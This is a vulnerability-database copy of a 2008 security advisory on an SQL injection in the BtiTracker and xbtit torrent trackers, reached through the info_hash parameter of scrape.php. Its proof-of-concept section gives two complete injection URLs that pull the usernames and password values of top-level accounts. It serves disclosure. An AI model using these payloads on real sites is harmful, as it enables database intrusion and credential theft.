Lucene search
K

btitrackerxbtit-sql.txt

🗓️ 26 Aug 2008 00:00:00Reported by InATeamType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

SQL Injection Vulnerability in BtiTracker and xbtit. Remote attacker can inject and execute arbitrary SQL commands in application`s database

Code
`SQL Injection Vulnerability in BtiTracker and xbtit  
  
Vulnerable products  
  
BtiTracker <=1.4.7  
https://sourceforge.net/projects/btit-tracker/  
  
xbtit <=2.0.542  
http://www.btiteam.org  
  
Description  
  
A vulnerability is caused due to the application does not perform sanitation  
checks for input passed to the parameter info_hash in scrape.php. A remote  
attacker can inject and execute arbitrary SQL commands in application`s  
database.  
  
PoC  
  
## Exploit:  
## =========================================================  
## http://site/scrape.php?info_hash=1%27)  
##  
+UNION+SELECT+0,CONCAT(0x3C623E,username,0x3a,password,0x3C2F623E3C62723E),0,0  
## +FROM+users+WHERE+id_level=8/*  
## =========================================================  
## for xBtiTracker we need to specify prefix:  
## =========================================================  
## http://site/scrape.php?info_hash=1%27)  
##  
+UNION+SELECT+0,CONCAT(0x3C623E,username,0x3a,password,0x3C2F623E3C62723E),0,0  
## +FROM+xbtit_users+WHERE+id_level=8/*  
## =========================================================  
  
Original advisories  
  
http://www.securitylab.ru/vulnerability/358375.php  
http://www.securitylab.ru/vulnerability/358377.php  
  
Credits  
  
The vulnerability was discovered by InATeam (http://inattack.ru/).  
  
  
BR,  
Valery Marchuk  
www.SecurityLab.ru  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Aug 2008 00:00Current
7.4High risk
Vulners AI Score7.4
19